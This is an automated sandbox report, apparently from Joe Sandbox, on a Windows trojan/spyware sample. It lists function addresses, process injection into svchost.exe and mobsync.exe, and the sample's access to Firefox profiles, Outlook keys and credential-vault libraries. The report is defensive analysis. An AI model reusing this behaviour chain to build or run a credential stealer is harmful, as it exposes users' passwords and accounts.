Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04408DBF	5_2_04408DBF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F0E59	5_2_043F0E59
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AEE26	5_2_044AEE26
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AEEDB	5_2_044AEEDB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04402E90	5_2_04402E90
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044ACE93	5_2_044ACE93
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04464F40	5_2_04464F40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04432F28	5_2_04432F28
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04410F30	5_2_04410F30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04492F30	5_2_04492F30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043FCFE0	5_2_043FCFE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0446EFA0	5_2_0446EFA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043E2FC8	5_2_043E2FC8
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043FA840	5_2_043FA840
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F2840	5_2_043F2840
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043D68B8	5_2_043D68B8
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0441E8F0	5_2_0441E8F0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04406962	5_2_04406962
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F29A0	5_2_043F29A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044BA9A6	5_2_044BA9A6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043EEA80	5_2_043EEA80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AAB40	5_2_044AAB40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A6BD7	5_2_044A6BD7
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043E1460	5_2_043E1460
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AF43F	5_2_044AF43F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A7571	5_2_044A7571
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044B95C3	5_2_044B95C3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0448D5B0	5_2_0448D5B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04435630	5_2_04435630
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A16CC	5_2_044A16CC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AF7B0	5_2_044AF7B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0449F0CC	5_2_0449F0CC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A70E9	5_2_044A70E9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AF0E0	5_2_044AF0E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F70C0	5_2_043F70C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044BB16B	5_2_044BB16B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0442516C	5_2_0442516C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043DF172	5_2_043DF172
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043FB1B0	5_2_043FB1B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0440B2C0	5_2_0440B2C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F52A0	5_2_043F52A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044912ED	5_2_044912ED
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A132D	5_2_044A132D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043DD34C	5_2_043DD34C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0443739A	5_2_0443739A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04469C32	5_2_04469C32
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AFCF2	5_2_044AFCF2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A1D5A	5_2_044A1D5A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A7D73	5_2_044A7D73
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F3D40	5_2_043F3D40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0440FDC0	5_2_0440FDC0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F9EB0	5_2_043F9EB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AFF09	5_2_044AFF09
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F1F92	5_2_043F1F92
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043B3FD2	5_2_043B3FD2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043B3FD5	5_2_043B3FD5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AFFB1	5_2_044AFFB1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0445D800	5_2_0445D800
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F38E0	5_2_043F38E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0440B950	5_2_0440B950
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04485910	5_2_04485910
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043F9950	5_2_043F9950
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AFA49	5_2_044AFA49
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044A7A46	5_2_044A7A46
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04463A6C	5_2_04463A6C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0449DAC6	5_2_0449DAC6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04435AA0	5_2_04435AA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0448DAAC	5_2_0448DAAC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04491AA3	5_2_04491AA3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_044AFB76	5_2_044AFB76
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04465BF0	5_2_04465BF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0442DBF9	5_2_0442DBF9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0440FB80	5_2_0440FB80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00411CB0	5_2_00411CB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0040CB80	5_2_0040CB80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0040AD80	5_2_0040AD80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0040CDA0	5_2_0040CDA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0040AEC4	5_2_0040AEC4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0040AED0	5_2_0040AED0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00415340	5_2_00415340
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00413540	5_2_00413540
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0042BA30	5_2_0042BA30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_041FE50B	5_2_041FE50B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_041FE741	5_2_041FE741
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_041FE288	5_2_041FE288
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0420533C	5_2_0420533C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_041FE3A3	5_2_041FE3A3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_041FD808	5_2_041FD808
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_041FCA98	5_2_041FCA98

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: String function: 005F8900 appears 42 times
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: String function: 005F0AE3 appears 70 times
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: String function: 005D7DE1 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 0445EA12 appears 86 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 0446F290 appears 105 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 043DB970 appears 280 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04437E54 appears 111 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04425130 appears 58 times

Source: M7XS5C07kV.exe, 00000000.00000003.1444689109.0000000003A23000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs M7XS5C07kV.exe
Source: M7XS5C07kV.exe, 00000000.00000003.1440441625.0000000003B7D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs M7XS5C07kV.exe

Source: M7XS5C07kV.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@9/8

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_0063A06A GetLastError,FormatMessageW,

0_2_0063A06A

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_006281CB AdjustTokenPrivileges,CloseHandle,		0_2_006281CB
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_006287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_006287E1

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_0063B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0063B333

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_0064EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0064EE0D

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_006483BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_006483BB

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_005D4E89

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

File created: C:\Users\user\AppData\Local\Temp\autF412.tmp

Jump to behavior

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Command line argument: xq	0_2_005D47D0
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Command line argument:	0_2_005D47D0
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Command line argument:	0_2_005D47D0

Source: M7XS5C07kV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mobsync.exe, 00000005.00000002.3296697636.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3296697636.000000000079E000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3296697636.00000000007F7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: M7XS5C07kV.exe	Virustotal: Detection: 58%
Source: M7XS5C07kV.exe	ReversingLabs: Detection: 91%

Source: unknown	Process created: C:\Users\user\Desktop\M7XS5C07kV.exe "C:\Users\user\Desktop\M7XS5C07kV.exe"
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\M7XS5C07kV.exe"
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\M7XS5C07kV.exe"	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: M7XS5C07kV.exe

Static file information: File size 1195008 > 1048576

Source: M7XS5C07kV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: M7XS5C07kV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: M7XS5C07kV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: M7XS5C07kV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: M7XS5C07kV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: M7XS5C07kV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: M7XS5C07kV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1651287512.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651373601.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651386050.0000000003231000.00000004.00000020.00020000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000002.3297019602.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JqFbrQRYIbA.exe, 00000004.00000000.1603560226.000000000022E000.00000002.00000001.01000000.00000005.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3296132611.000000000022E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: M7XS5C07kV.exe, 00000000.00000003.1443099591.0000000003900000.00000004.00001000.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1445760931.0000000003AA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1688409314.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1688409314.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585196763.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587698865.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1686094403.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.000000000454E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1691396429.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.00000000043B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: M7XS5C07kV.exe, 00000000.00000003.1443099591.0000000003900000.00000004.00001000.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1445760931.0000000003AA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1688409314.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1688409314.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585196763.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587698865.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.1686094403.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.000000000454E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1691396429.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.00000000043B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1651287512.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651373601.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651386050.0000000003231000.00000004.00000020.00020000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000002.3297019602.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3296697636.0000000000749000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299870196.00000000049DC000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000000.1757428448.000000000258C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1982761385.000000000683C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3296697636.0000000000749000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299870196.00000000049DC000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000000.1757428448.000000000258C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1982761385.000000000683C000.00000004.80000000.00040000.00000000.sdmp

Source: M7XS5C07kV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: M7XS5C07kV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: M7XS5C07kV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: M7XS5C07kV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: M7XS5C07kV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D4B37 LoadLibraryA,GetProcAddress,

0_2_005D4B37

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005DC4C6 push A3005DBAh; retn 005Dh	0_2_005DC50D
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005F8945 push ecx; ret	0_2_005F8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004143C1 push cs; ret	2_2_004143C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403070 push eax; ret	2_2_00403072
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004120AF push ebp; retf	2_2_004120B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418172 push esi; retf	2_2_0041817D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AADE push ebp; iretd	2_2_0040AAE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414344 push cs; ret	2_2_004143C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417C7C push esi; iretd	2_2_00417C7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413D3D push esp; ret	2_2_00413D3E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040CE68 push ecx; retf	2_2_0040CE6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380225F pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038027FA pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx	2_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380283D push eax; iretd	2_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03801368 push eax; iretd	2_2_03801369
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043B27FA pushad ; ret	5_2_043B27F9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043B225F pushad ; ret	5_2_043B27F9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043B283D push eax; iretd	5_2_043B2858
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043E09AD push ecx; mov dword ptr [esp], ecx	5_2_043E09B6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_043B1358 push eax; iretd	5_2_043B1369
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00418330 pushfd ; retf	5_2_0041833B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00412414 push ecx; retf	5_2_0041244C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00414C09 push esi; iretd	5_2_00414C0C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00410CCA push esp; ret	5_2_00410CCB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0041ED60 push esi; retf	5_2_0041ED6B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00420E12 push edx; iretd	5_2_00420E13
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00420FE1 push cs; ret	5_2_00420FE2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0040F03C push ebp; retf	5_2_0040F03D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_004150FF push esi; retf	5_2_0041510A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_00407A6B push ebp; iretd	5_2_00407A6D

